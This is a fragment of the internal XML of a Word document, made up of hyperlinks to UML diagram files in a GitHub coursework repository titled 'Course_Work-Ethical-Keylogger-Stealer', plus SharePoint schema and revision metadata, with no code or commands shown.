;&#1080;&#1076;&#1080;&#1090;&#1089;&#1103;.draw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hadowLance2/Course_Work-Ethical-Keylogger-Stealer/blob/main/&#1055;&#1088;&#1086;&#1077;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1097;&#1080;&#1082;/&#1060;&#1091;&#1085;&#1082;&#1094;&#1080;&#1086;&#1085;&#1072;&#1083;&#1100;&#1085;&#1099;&#1077;%20&#1076;&#1080;&#1072;&#1075;&#1088;&#1072;&#1084;&#1084;&#1099;%20(&#1044;&#1080;&#1072;&#1075;&#1088;&#1072;&#1084;&#1084;&#1072;%20&#1087;&#1088;&#1077;&#1094;&#1077;&#1076;&#1077;&#1085;&#1090;&#1086;&#1074;%2C%20&#1076;&#1080;&#1072;&#1075;&#1088;&#1072;&#1084;&#1084;&#1072;%20&#1089;&#1086;&#1089;&#1090;&#1086;&#1103;&#1085;&#1080;&#1081;%20)UML.draw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github.com/ShadowLance2/Course_Work-Ethical-Keylogger-Stealer/blob/main/&#1056;&#1072;&#1079;&#1088;&#1072;&#1073;&#1086;&#1090;&#1095;&#1080;&#1082;/&#1044;&#1080;&#1072;&#1075;&#1088;&#1072;&#1084;&#1084;&#1072;%20&#1087;&#1072;&#1082;&#1077;&#1090;&#1086;&#1074;%20UML.draw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bdesigner.page.link/qf9u1Gco7GMcPkik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ShadowLance2/Course_Work-Ethical-Keylogger-Stealer/blob/main/&#1055;&#1088;&#1086;&#1077;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1097;&#1080;&#1082;/&#1050;&#1086;&#1085;&#1094;&#1077;&#1087;&#1090;&#1091;&#1072;&#1083;&#1100;&#1085;&#1072;&#1103;%20&#1084;&#1086;&#1076;&#1077;&#1083;&#1100;%20&#1041;&#1044;.draw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ShadowLance2/Course_Work-Ethical-Keylogger-Stealer" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ShadowLance2/Course_Work-Ethical-Keylogger-Stealer/blob/main/&#1055;&#1088;&#1086;&#1077;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1097;&#1080;&#1082;/&#1044;&#1080;&#1072;&#1075;&#1088;&#1072;&#1084;&#1084;&#1072;%20&#1087;&#1086;&#1089;&#1083;&#1077;&#1076;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1100;&#1085;&#1086;&#1089;&#1090;&#1080;%20UML.drawi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6431-abcf-42a9-8048-b9a9c43f7bef">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </lcf76f155ced4ddcb4097134ff3c332f>
    <TaxCatchAll xmlns="029c7d08-4ad6-4199-b10f-b622b65b8db2" xsi:nil="true"/>
    <ReferenceId xmlns="d6f36431-abcf-42a9-8048-b9a9c43f7b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B768F0AFE444B55BCFBB9806D038" ma:contentTypeVersion="11" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="4fb6d3b72b2e9470edd038f399b70a11">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="d6f36431-abcf-42a9-8048-b9a9c43f7bef" xmlns:ns3="029c7d08-4ad6-4199-b10f-b622b65b8db2" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="0d977e5196ac9e77d43a0f6d473c3a13" ns2:_="" ns3:_="">
    <xsd:import namespace="d6f36431-abcf-42a9-8048-b9a9c43f7bef"/>
    <xsd:import namespace="029c7d08-4ad6-4199-b10f-b622b65b8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6431-abcf-42a9-8048-b9a9c43f7b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7d08-4ad6-4199-b10f-b622b65b8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9fd92-5d31-4c89-8f50-a766eaf42506}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="029c7d08-4ad6-4199-b10f-b622b65b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A9C-EBFB-4176-957F-AB1646219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E329-686A-491F-B5B4-E365E6866478}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="d6f36431-abcf-42a9-8048-b9a9c43f7bef"/>
    <ds:schemaRef ds:uri="029c7d08-4ad6-4199-b10f-b622b65b8db2"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{551C2E97-3BE2-4AD4-A755-FCE05A24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6431-abcf-42a9-8048-b9a9c43f7bef"/>
    <ds:schemaRef ds:uri="029c7d08-4ad6-4199-b10f-b622b65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C03F0-3552-4661-AB9F-2BD1ACF5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6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373</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-06-01T12:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01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B768F0AFE444B55BCFBB9806D038</vt:lpwstr>
  </property>
</Properties>
</file>